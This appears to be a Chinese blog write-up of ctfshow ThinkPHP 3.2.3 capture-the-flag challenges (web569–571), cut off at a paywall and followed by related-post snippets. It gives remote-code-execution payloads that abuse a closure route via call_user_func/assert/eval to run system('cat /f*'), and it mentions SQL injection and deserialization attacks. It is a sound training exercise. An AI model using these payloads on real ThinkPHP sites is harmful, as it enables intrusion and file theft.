ctfshow ThinkPHP篇—3.2.3(569-578)

最新推荐文章于 2025-02-24 20:37:02 发布
原创 最新推荐文章于 2025-02-24 20:37:02 发布 · 2.6k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细探讨了ThinkPHP框架中的多种安全漏洞,包括URL路由规则利用、SQL注入、代码执行等,并提供了相应的攻击payload示例。通过实例解析了如何通过不同模式访问控制器方法,以及如何利用路由规则、函数调用来执行任意代码。同时,文章还介绍了防止这些攻击的安全措施,提醒开发者注意代码安全。

文章目录

web569

相关内容

参考thinkphp手册
在这里插入图片描述
为了访问下图中的index方法并输出hello 123我们可以通过下面四种模式。
在这里插入图片描述
PATHINFO模式
http://localhost/index.php/Home/Index/index/name/123/
普通模式
http://localhost/index.php?m=Home&c=Index&f=index&name=123
兼容模式
http://localhost/index.php?s=Home/Index/index/name/123
其中参数s来自于ThinkPHP->Conf->convention.php中的VAR_PATH_INFO设置,所以我们也可以改成其他的参数。
REWRITE模式
http://localhost/Home/Index/index/name/123/

题解

所以我们要访问Admin模块的Login控制器的ctfshowLogin方法就很简单了
url/index.php/Admin/Login/ctfshowLogin

web570

下载下来题目给的Applicaition文件,在config.php中发现了一条路由规则。
在这里插入图片描述

	'URL_ROUTE_RULES' => array(
    'ctfshow/:f/:a' =>function($f,$a){
   
   
    	call_user_func($f, $a);
    	}
    )

也就是当我们访问url/index.php/ctfshow/xxx/yyy时会执行call_user_func(xxx,yyy)。
因为输入/很困难,所以我们直接执行system(‘ls /’)不太可能,只能换种方法。
payload:
url/index.php/ctfshow/assert/eval($_POST[1])/post: 1=system('cat /f*');

web571

在home模块下的index方法中看到了可控变量n。
在这里插入图片描述
那我们来研究下这个show函数,为了方面我们传的参数只留下$n

<?php
namespace Home\Controller;
use
最低0.47元/天 解锁文章
Ctfshow web入门 thinkphp专题
feng的博客
04-25 4631
web569 看一下thinkphp3.2.3官方手册,看完就都懂了: ThinkPHP3.2.3完全开发手册 首先就是路由的方式: http://serverName/index.php/模块/控制器/操作 此外就是默认是不区分大小写的,由'URL_CASE_INSENSITIVE' => true,这个配置决定。 URL模式的话,默认是PATHINFO模式,即本题考察的模式。 直接访问即可: /index.php/admin/login/ctfshowlogin web570 下载源码,在C
ctfshow ThinkPHP575
羽的博客
08-05 991
web575 给了源码 $user= unserialize(base64_decode(cookie('user'))); if(!$user || $user->id!==$id){ $user = M('Users'); $user->find(intval($id)); cookie('user',base64_encode(serialize($user->data()))); } $this->show($user->username); } 首先引起注意的
CTFSHOW ThinkPHP
最新发布
2301_80038080的博客
02-24 439
ThinkPHP中,Pathinfo 是一种用于解析 URL 的模式,它允许通过路径参数来指定模块、控制器和方法。根据题目描述,flag 存在于 Admin 模块的 Login 控制器的 ctfshowLogin 方法中,因此需要通过 URL 访问该方法。在 ThinkPHP 的 Pathinfo 模式下,URL 的结构通常为:/index.php/模块/控制器/方法。
ctfshow_ThinkPHP专题
qq_45951598的博客
07-02 528
web569-- 路由 打开页面是这样的 这里的话推荐想看一下3.2.3的开发手册,网站地址是ThinkPHP3.2.3完全开发手册 不想看的,我就简单的截取一张图片来看一下 PATHINFO模式下面的URL访问地址是: http://localhost/index.php/home/user/login/var/value/ 然后根据提示直接构造就是了 payload:http://1a941035-d87a-4eea-9068-77062fa67c57.challenge.ctf.show:80
ctfshow ThinkPHP573
羽的博客
08-05 1180
web573 thinkphp 3.2.3sql注入漏洞 源代码 class IndexController extends Controller { public function index(){ $a=M('xxx'); //表名 $id=I('GET.id'); $b=$a->find($id); var_dump($b); } } 来调试一下看为什么普通的注入不行。本地sql表内数据如下。 传入?id=1' 首先在I函数里面有个过滤,调用
CTFshow——thinkphp专题
D.MIND 的博客
06-12 2003
570——闭包路由 关注这段代码:这是闭包路由的用法,官方:手册闭包支持 我们用phpinfo()函数测试一下:是可以的 /index.php/ctfshow/phpinfo/1 注意因为eval是一个语言结构而不是函数,所以这里是不能被call_user_func调用的,而assert是一个函数。因此我想到了assert(system("ls"));,但在尝试ls /时却不行了,很迷。 然后我想着参数转移一下。然后下意识构造出这样: /index.php/ctfshow/assert/$_POST[1
ctfshow thinkphp专题
qq_50589021的博客
10-13 1040
前言 跟进一步增强php的代码审计能力,了解tp框架 从最基础的开始学习,目的不是为了一把梭,而是要明白它的原理和设计思路,为我们以后自主调试挖洞打下基础 web569——路由 本题使用的版本为3.2.3 ThinkPHP3.2.3完全开发手册-架构-URL模式 入口文件是应用的单一入口,对应用的所有请求都定向到应用入口文件,系统会从URL参数中解析当前请求的模块、控制器和操作: http://serverName/index.php/模块/控制器/操作 这是3.2版本的标准URL格式。 payload
ctfshow-thinkphp
giaogiao123的博客
08-23 1165
基础知识 关于thinkphp需要知道的基本知识 https://www.kancloud.cn/manual/thinkphp/1696 demo1 修改 D:\phpStudy\PHPTutorial\WWW\thinkphp-3.2\thinkphp-3.2\Application\Home\Controller\IndexController.class.php <?php namespace Home\Controller; use Think\Controller; class Inde
ctfshow ThinkPHP专题 1
qq_61768489的博客
07-23 932
PATHINFO模式是系统的默认URL模式,提供了最好的SEO支持,系统内部已经做了环境的兼容处理,所以能够支持大多数的主机环境。REWRITE模式是在PATHINFO模式的基础上添加了重写规则的支持,可以去掉URL地址里面的入口文件index.php,但是需要额外配置WEB服务器的重写规则。m参数表示模块,c参数表示控制器,a参数表示操作(当然这些参数都是可以配置的),后面的表示其他GET参数。,ThinkPHP支持的URL模式有四种普通模式、PATHINFO、REWRITE和兼容模式。...
ctfshow thinkphp 3.2.3
blowed的博客
05-04 362
web569 相关内容 参考thinkphp手册 路由方式 http://serverName/index.php/模块/控制器/操作 此外就是默认是不区分大小写的,由'URL_CASE_INSENSITIVE' => true,这个配置决定。 URL模式的话,默认是PATHINFO模式,即本题考察的模式。 直接访问即可: /index.php/admin/login/ctfshowlogin web 570 根据题目提示 就直接看官方文档 路由一块 看到了闭包函数 .
ctfshow thinkPHP专题
qq_45655564的博客
08-31 414
569-Thinkphp3.23的url访问规则 https://www.kancloud.cn/manual/thinkphp/1697 URL模式 入口文件是应用的单一入口,对应用的所有请求都定向到应用入口文件,系统会从URL参数中解析当前请求的模块、控制器和操作: http://serverName/index.php/模块/控制器/操作 这是3.2版本的标准URL格式。 可以通过设置模块绑定或者域名部署等方式简化URL地址中的模块及控制器名称。 所以 访问 url/index.php/Admin
ctfshow- thinkphp专题笔记一
Yasso的博客
11-26 1077
web569 @[TOC]web569
ctfshowThinkphp
灰太的表格的博客
08-24 349
web569 web570 /index.php/Home/ctfshow/assert/eval($_GET[1])/?1=system("tac%20/f*"); 闭包路由:参考官方文档或博客 web571 给了源码,找到一处可以进行传参的控制器,传个参数在这,打个断点调下: 接着跟进去: 接着跟进: 我们最开始传的参数在content变量里,跟进到if(这里有个对于当前使用的一个模板的判断,由于不知道题目使用的是哪种所以我就用0,1了图方便): 往下走: 成功找到后门,conten
WebCtfshow Thinkphp3.2.3代码审计(4)
uuzeray的博客
12-28 1443
这里是从cookie里读user键对应的值进行反序列化,并将实例化对象与传入的id比较,如果id属性与传入的id相等,则show方法调用底层的eval执行实例化对象的username属性。因此,确保在进行反序列化之前,你需要确保序列化的类定义存在,并且能够被自动加载或手动引入。这里令$name=_content,$from=写的马即可让$_content非空,从而eval()执行php代码。这次where()里直接传了一个数组,省得走if将字符串的值再改为_string的数组了。
WebCtfshow Thinkphp3.2.3代码审计(3)
uuzeray的博客
12-26 425
(这里我认为数据库id字段类型为varchar,这样数组条件判断进_parseType()就不会受到数字型或布尔型强制类型转化干扰)发现会进到is_string的判断里,让$options['where']=array("_string"=>"1")之后传入到find(),和web573一样也是以数组形式传参,只不过传入的参数也是数组,我们跟一下代码。键'_string'的首字符为'_',跟进parseThinkWhere()这题与web573的区别在于进find()前先进了where()处理。
WebCtfshow Thinkphp3.2.3代码审计(2)
uuzeray的博客
12-25 612
这段代码的作用是根据数据库字段类型的定义,对数据进行相应的类型转换,以确保数据的类型与数据库字段类型匹配,从而提高数据的准确性和一致性。比如数据库中的id是int型会进入intval函数,你输入1' union select * # 转换后就成了1。因为$options['where']是一个数组,所以会从if进入_parseType。其实很明显就是让$options['where']不为数组就可以了。所以要用一些路子,不进入到下面的if判断里。因为1是number,所以会让。这是我们不愿意看到的。
WebCtfshow Thinkphp5 非强制路由RCE漏洞
uuzeray的博客
12-29 1321
前面审了一些tp3的sql注入,终于到tp5了,要说tp5那最经典的还得是rce下面介绍非强制路由RCE漏洞。
WebCtfshow Thinkphp3.2.3代码审计(1)
uuzeray的博客
11-26 527
ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多站都没关,其目录结构为 Application/Runtime/Logs/Home/年份_月份_日期.log。在fetch方法中执行了eval('?访问/Application/Runtime/Logs/Home/21_04_15.log。发现任意命令执行后门:/index.php?题目提示要爆破,而且不超过365次 (1年的天数)查看附件源码 (config.php)发现定义了一个可执行命令的路由规则。
thinkphp3.2.3 Session-Redis分布式驱动实现分享
在这一版本中,官方并没有自带session-redis驱动,因此,本知识点将详细解释如何在ThinkPHP 3.2.3版本中使用Redis作为Session的存储后端,以及为什么要使用Redis分布式驱动作为Session管理方式。 Redis是一种基于...
评论 4
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值